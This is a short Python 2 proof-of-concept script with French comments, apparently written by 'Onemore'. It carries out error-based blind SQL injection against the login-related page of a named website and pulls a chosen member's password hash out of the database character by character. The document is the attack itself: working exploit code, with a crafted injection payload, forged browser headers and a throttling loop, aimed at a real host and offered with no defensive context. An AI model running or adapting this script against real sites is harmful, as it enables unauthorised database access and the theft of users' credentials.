#! /usr/bin/env python

import httplib
import time
import sys

### Error Based SQLI
### PoC de recuperation des Hashs des pass membre
### Author : Onemore
### Usage ./piege.py Username

#declaration charset
charset = ['0','9','8','7','6','5','4','3','2','1','a','b','c','d','e','f']

nom = sys.argv[1][::-1].upper()
res = ''

for i in range(1,33):
    for char in range(len(charset)):
        time.sleep(10)
        site = 'hackbbs.org'
        page = '/index.php?nav=outils&page=access-passwd'
        h = httplib.HTTP(site)
        data = ''
        h.putrequest('POST',page)
        h.putheader('Host', site)
        h.putheader('User-Agent', ' Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8')
        h.putheader('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')
        h.putheader('Accept-Language', 'fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3')
        h.putheader('Accept-Encoding', '')
        h.putheader('Referer', 'http://hackbbs.org/index.php?nav=outils&page=access-passwd')
        h.putheader('Cookie' , 'PHPSESSID=xxxxxxxxxxxxxx; name=EROMENO; PHPSESSID=xxxxxxxxxxxxxx')
        h.putheader('Content-Type', 'application/x-www-form-urlencoded')
        h.putheader('DNT', 1)
        params = "user=user',(if((SELECT ORD(SUBSTRING(pass,"+str(i)+",1)) FROM membre WHERE name = '"+nom+"')="+str(ord(charset[char]))+",(select name from membre where name like '%%'),'1337')),'site')#&pass=te&site=te"
        h.putheader('Connection', 'keep-alive')
        body = params
        h.putheader('Content-Length', "%d" % len(body))
        h.endheaders()
        h.send(body)
        reponse,msg,entete = h.getreply()
        data = data + str(entete) + h.getfile().read()
        if 'Subquery returns more than 1 row' in data:
            res += charset[char]
            print 'Hash en cours....', res
            break

print 'User :', nom[::-1]
print 'Hash :', res